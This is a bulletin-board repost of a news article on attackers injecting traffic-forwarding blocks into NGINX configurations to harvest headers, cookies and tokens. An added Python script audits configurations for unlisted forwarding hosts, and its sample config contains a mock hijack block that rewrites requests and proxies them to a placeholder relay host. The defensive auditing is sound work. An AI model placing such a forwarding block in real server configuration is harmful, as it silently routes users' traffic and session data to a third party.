BBS:      TELESC.NET.BR
Subject:  NGINX servers hijacked in global campaign to redirect traffic
From:     Mike Powell
Date:     Fri, 6 Feb 2026 11:50:54 -0500
-----------------------------------------------------------
NGINX servers hijacked in global campaign to redirect traffic

By Sead Fadilpašić published yesterday

Redirected traffic can be abused in multiple ways, experts warn

Cybercriminals are targeting NGINX servers, rerouting legitimate traffic
through their malicious infrastructure, experts have warned.

Security researchers at Datadog Security Labs found the attackers are focused
primarily on Asian targets in the government and education industries.

NGINX servers are software systems that sit in front of websites or apps and
handle incoming web traffic. They serve content, balance loads, and route
requests to the appropriate backend servers.

What to do with the stolen data

In the attack, the unnamed threat actors modify the NGINX configuration files
and inject malicious blocks that grab incoming requests. They then rewrite them
to include the original URL and forward traffic to domains under their control.
According to Datadog, this is a five-stage attack that starts with a
configuration injection and ends with data exfiltration.

Since no vulnerability is being abused here, and the victims still end up on
the pages they asked for, no one is the wiser. Still, cybercriminals are getting
away with valuable information that can be used in different ways. Because
headers are preserved, the attacker can collect IP addresses, user agents,
referrers, session tokens, cookies, and sometimes credentials or API keys if
they appear in requests. On government or .edu sites, that data is especially
valuable.

They can also manipulate content, selectively. Since only certain URL paths are
hijacked, the attacker can inject ads, phishing pages, malware downloads, or
fake login prompts only when they want, successfully targeting specific users,
regions, or time zones.

Then, there is the option of traffic monetization and resale. Clean, real user
traffic routed through attacker infrastructure can be sold for ad fraud, SEO
manipulation, click-fraud, or used to boost other malicious services, which is
a common practice in large-scale proxy ecosystems.

Finally, compromised NGINX servers can be used to proxy attacks against other
targets, effectively masking their origins.

Via BleepingComputer


https://www.techradar.com/pro/security/nginx-servers-hijacked-in-global-campaign-to-redirect-traffic

$$
--- SBBSecho 3.28-Linux
 * Origin: Capitol City Online (1:2320/105)
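
Added example, not part of the article or of Datadog's research: because the attack described above works by injecting forwarding blocks into NGINX configuration, one defensive check is to audit the effective configuration for forwarding targets outside an allowlist. The allowlist, the sample config and the host relay.example.invalid are constructed assumptions; the check covers `return` as well as the `rewrite` and forwarding directives the article mentions.

```python
import re
import sys
from urllib.parse import urlsplit

# Assumption: hosts (and named upstreams) this server legitimately forwards to.
ALLOWED_HOSTS = {"127.0.0.1", "localhost"}

FILE_RE = re.compile(r"^# configuration file (\S+):")   # file markers printed by `nginx -T`
DIRECTIVE_RE = re.compile(r"^\s*(proxy_pass|rewrite|return)\s+([^;]+);")
URL_RE = re.compile(r"https?://[^\s;\"']+")

def audit(config_text, allowed_hosts=ALLOWED_HOSTS):
    """Return (file, line, directive, host) for every forwarding target outside the allowlist."""
    findings, current_file, line_no = [], "<input>", 0
    for raw in config_text.splitlines():
        marker = FILE_RE.match(raw)
        if marker:                      # start of the next included file
            current_file, line_no = marker.group(1), 0
            continue
        line_no += 1
        directive = DIRECTIVE_RE.match(raw.split("#", 1)[0])   # ignore comments
        if not directive:
            continue
        for url in URL_RE.findall(directive.group(2)):
            host = urlsplit(url).hostname or ""
            if host not in allowed_hosts:   # variables such as $backend are flagged too
                findings.append((current_file, line_no, directive.group(1), host))
    return findings

# Constructed sample in `nginx -T` layout; relay.example.invalid is a placeholder.
SAMPLE = """\
# configuration file /etc/nginx/conf.d/site.conf:
server {
    listen 80;
    location / {
        proxy_pass http://127.0.0.1:8080;
    }
    location /news/ {
        rewrite ^/(.*)$ /in?u=$scheme://$host/$1 break;
        proxy_pass http://relay.example.invalid;
    }
}
"""

if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE
    for path, line, name, host in audit(text):
        print(f"{path}:{line}: {name} forwards to unlisted host {host!r}")
```

Piping the output of `nginx -T` into the script audits the configuration NGINX actually loads, including every included file, rather than only the main file.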

-----------------------------------------------------------